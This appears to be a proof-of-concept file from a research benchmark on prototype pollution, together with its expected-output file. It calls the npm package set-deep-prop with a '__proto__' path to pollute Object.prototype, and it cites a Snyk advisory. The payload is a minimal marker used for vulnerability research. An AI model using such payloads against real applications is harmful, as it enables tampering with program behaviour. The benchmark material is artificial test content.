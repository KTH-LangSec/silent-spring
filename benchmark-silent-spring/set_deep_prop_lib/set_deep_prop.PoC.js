//https://snyk.io/vuln/SNYK-JS-SETDEEPPROP-1083231
  const setDeepProp = require("set-deep-prop");
  var obj = {};

  setDeepProp({}, ["__proto__", "polluted"], "yes");
