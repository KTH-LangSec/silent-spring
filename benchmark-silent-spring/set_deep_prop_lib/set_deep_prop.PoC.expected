node_modules/set-deep-prop/set-deep-prop.js:20:34